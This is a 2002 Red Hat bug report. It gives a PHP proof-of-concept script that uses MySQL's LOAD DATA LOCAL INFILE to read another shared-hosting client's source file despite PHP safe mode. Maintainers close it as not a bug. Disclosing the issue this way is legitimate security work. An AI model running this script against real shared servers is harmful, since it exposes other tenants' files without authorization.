Bug 59916 - PHP in safe mode can read all the server contents
Summary: PHP in safe mode can read all the server contents
Status: CLOSED NOTABUG
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: mysql (Show other bugs)
(Show other bugs)
Version: 7.2
Hardware: i386 Linux
medium
medium
Target Milestone: ---
Assignee: Patrick Macdonald
QA Contact: David Lawrence
URL:
Whiteboard:
Keywords: Security
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2002-02-14 20:26 UTC by Renato
Modified: 2007-04-18 16:40 UTC (History)
0 users

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2002-02-27 13:53:57 UTC
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

Description Renato 2002-02-14 20:26:06 UTC
From Bugzilla Helper:
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)

Description of problem:
By using a flaw in PHP+Mysql query, somebody can bypass safe mode. 

Version-Release number of selected component (if applicable):


How reproducible:
Always

Steps to Reproduce:
1. Use the script:

$host = 'localhost';
$user = 'root';
$pass = 'letmein';
$db   = 'teste';

$filename = '/home/othercliente/myscript.php';     /* File to grab from [local] 
server */
$local = true;                      /* Read from local filesystem */

$local = $local ? 'LOCAL' : '';


$sql = array (
   "USE $db",

   'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',

   "LOAD DATA $local INFILE '$filename' INTO TABLE $tbl FIELDS "
   . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
   . "ESCAPED BY          '' "
   . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",

   "SELECT a FROM $tbl LIMIT 1"
);

Header ('Content-type: text/plain');

mysql_connect ($host, $user, $pass);	

foreach ($sql as $statement) {
   $q = mysql_query ($statement);

   if ($q == false) die (
      "FAILED: " . $statement . "\n" .
      "REASON: " . mysql_error () . "\n"
   );

   if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;

   echo $r [0];
   mysql_free_result ($q);
}

2. Call the script using wget http://server/script

Actual Results:  You can view the source of the other client

Additional info:

Comment 1 Phil Copeland 2002-02-14 21:28:13 UTC
rpm -q php
I need to know which one it is please 

cheers

Phil
=--=

Comment 2 Renato 2002-02-15 10:40:35 UTC
php: 4.0.6-7
php-mysql: 4.0.6-7

It's configured as a module in Apache.

Comment 3 Peter Bowen 2002-02-27 13:53:52 UTC
This is not a bug in PHP.  This is a potential bug with MySQL, but php' safe
mode cannot prevent this.  PHP can only protect internal php functions, and
mysql_* use the mysql client library.  I'm moving this to the MySQL component,
as it can only be handled there.

Comment 4 Trond Eivind Glomsrxd 2002-04-08 19:31:47 UTC
This is not a bug in mysql, it does what you want and it can do. Don't set up
unsafe scripts


Note You need to log in before you can comment on or make changes to this bug.